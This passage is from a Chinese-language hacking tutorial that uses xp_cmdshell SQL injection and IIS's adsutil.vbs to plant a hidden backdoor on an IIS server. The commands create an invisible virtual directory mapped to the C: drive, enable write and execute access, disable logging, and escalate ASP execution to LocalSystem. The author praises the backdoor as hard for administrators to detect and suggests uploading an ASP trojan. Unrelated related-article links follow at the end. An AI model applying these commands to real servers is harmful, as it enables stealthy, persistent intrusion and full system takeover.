Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1';--
可能會有人說,什么阿。不就是和上面的一樣嗎?呵呵。其實(shí)你仔細(xì)看。會發(fā)現(xiàn)我們上面新建的第一個(gè)目錄“wofeiwo”并沒有設(shè)置“Path”屬性。也就是說他沒有映射到任何實(shí)際的目錄上去。這里應(yīng)用了IIS的一個(gè)漏洞(涉及到IIS5.0.1.0)。即對于沒有“Path”屬性的虛擬目錄是不會在IIS管理器中出現(xiàn)的。相當(dāng)于一個(gè)隱藏的目錄。而其下的虛擬目錄“door”同樣是由于上級目錄不可見的,所以它也是不可見的!但是“door”目錄是設(shè)置了“Path”屬性的。所以如果我們提交http://IP/wofeiwo/door/ 路徑。其結(jié)果是會返回C:下的文件目錄?,F(xiàn)在此目錄已經(jīng)是我們可以任意寫文件讀文件了。并且還可以轉(zhuǎn)到System32目錄下對程序進(jìn)行運(yùn)行。我們的后門雛形建成了。(注意看我這里是加上了AccessExecute執(zhí)行權(quán)限的)
但是我們現(xiàn)在執(zhí)行的程序都還是IIS默認(rèn)的IUSR用戶的Guest權(quán)限。沒有大的權(quán)限我們總是不爽。下面來提升我們的權(quán)限,加IUSR用戶為管理員就不說了。下面說說另兩個(gè)方法:
1、設(shè)置AppIsolated,使此目錄下程序在IIS的進(jìn)程中進(jìn)行。這樣就繼承了IIS的System權(quán)限。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/ AppIsolated 0';--
2、 將解析asp文件的asp.dll加入到IIS的特權(quán)dll中。使得其在進(jìn)程中運(yùn)行。從而的到IIS的LocalSystem權(quán)限。
1)首先得到IIS所有的特權(quán)dll
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs GET w3svc/InProcessIsapiApps';--
返回:
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINDOWS\system32\inetsrv\httpext.dll"
"C:\WINDOWS\system32\inetsrv\httpodbc.dll"
"C:\WINDOWS\system32\inetsrv\ssinc.dll"
"C:\WINDOWS\system32\msw3prt.dll"
"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll"
2) 將asp.dll設(shè)置到InProcessIsapiApps組中去,這里要注意,把上面的所有查到的dll都加上,否則會被刪除。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/InProcessIsapiApps "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"';--
返回:
InProcessIsapiApps : (LIST) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"
這樣就設(shè)置好了。以后無論什么asp文件就都是 LoaclSystem權(quán)限了。通過以上的步驟。我們的IIS后門基本上就是設(shè)置好了。你可以上傳asp木馬加以輔助控制。這樣的設(shè)置型后門是很難被管理員發(fā)現(xiàn)的。并且完全通過IIS的80端口通訊。又沒有日志記錄。所以相當(dāng)安全。
三、結(jié)言
到這里我關(guān)于adsutil.vbs的一點(diǎn)簡單應(yīng)用就結(jié)束了。突然發(fā)現(xiàn)文章已經(jīng)寫了那么多了。哇啊啊……文章寫得好累阿。由于本人是一菜鳥。文章難免有疏漏。還請大家多多指教。有什么疑問請和我聯(lián)系。我的郵箱:wofeiwo@bugkidz.org?;蛘叽蠹铱梢缘交鸷夹g(shù)聯(lián)盟http://www.wrsky.com來找我。我的ID:我非我。是論壇新手版的版主。
相關(guān)文章
VBS 添加右鍵計(jì)算文件MD5的實(shí)現(xiàn)代碼
最近相關(guān)的備份比較頻繁,為了校驗(yàn)文件的完整性,老是要打開某文件HASH校驗(yàn)工具,比較麻煩,于是乎寫了這個(gè)東東,文件較大時(shí)計(jì)算有點(diǎn)慢,文件的MD5值保存在剪貼板2013-07-07使用 Iisftp.vbs 創(chuàng)建FTP站點(diǎn)的方法
Iisftp.vbs 使用的默認(rèn)屬性與 IIS 管理器在建立新的 FTP 站點(diǎn)時(shí)使用的屬性相同,并且它遵循相同的繼承屬性規(guī)則。要配置 FTP 站點(diǎn)的更多高級屬性,請使用 IIS 管理器2014-07-07VBS教程:VBScript 基礎(chǔ)-VBScript 數(shù)據(jù)類型
VBS教程:VBScript 基礎(chǔ)-VBScript 數(shù)據(jù)類型...2006-11-11